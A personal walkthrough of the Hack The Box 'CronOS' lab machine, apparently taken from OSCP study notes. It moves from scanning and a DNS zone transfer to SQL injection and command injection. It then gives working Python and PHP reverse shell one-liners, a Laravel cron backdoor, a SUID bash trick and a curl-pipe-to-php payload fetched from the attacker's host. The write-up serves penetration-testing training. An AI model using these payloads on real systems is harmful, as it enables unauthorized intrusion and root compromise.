O
O
OSCP Notes
Search
K
Comment on page

HTB CronOS Writeup

nmap:
Host is up (0.11s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP enum:

  • Default server page found for apache2
try doing nslookup:
commands: nslookup
type: server
now that we see that it's hosting cronos.htb, let's try some zone transfer to discover any other subdomains.
dig AXFR cronos.htb @IP
Go buster didn't have luck.
save the found sub-domains to /etc/hosts
Found the admin page.
try the sql injection
save the post request as login.req and do
sqlmap -r login.req
redirecting happening/
tried using '-- - in the user section and it worked! (intercept the traffic in the burpsuite and url encode it)
now we can execute any commands!
Adjusting the command section in the burpsuite, I was able to execute a command.
Let's try a one liner to get a reverse shell.
tried
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.131",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Make sure to url encode it. got the reverse shell!
called the shell with python -c 'import pty; pty.spawn("/bin/sh")'

PrevEsc

  • host the linpeas.sh and run it
Found a suspicious cronjob
php
php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
where we can find a kernel cron job:
"app/Console/Kernel.php"
how to set up a cronjob that contains terminal commands
protected function schedule(Schedule $schedule)
{
$schedule->exec('cd ~/Code/lpg && ls')
->everyMinute()
->sendOutputTo('/home/vagrant/Code/lpg/listing.txt');
}
find / -name Kernel.php 2>/dev/null
$schedule->exec('php -r '$sock=fsockopen("10.10.14.131",7777);exec("/bin/sh -i <&3 >&3 2>&3");')->everyMinute();php -r '$sock=fsockopen("10.10.14.131",7777);exec("/bin/sh -i <&3 >&3 2>&3");'
I located the file in the html and downloaded by visiting the site.
Used this guy's method:
let’s just make a temporary copy of bash (as root) and give it the SUID bit.
We add the following code to Kernel.php
protected function schedule(Schedule $schedule)
{
$cmd = 'cp $(which bash) /tmp/sbash; chmod +s /tmp/sbash';
$schedule->exec($cmd)->everyMinute();
}
…then wait a minute for the cron and eventually execute ./sbash -p from /tmp.
Another method would be to edit the artisan file and let the system download a reverseshell from our host and execute it.
<?php system('curl http://10.10.14.57/reverse.php | php') ?>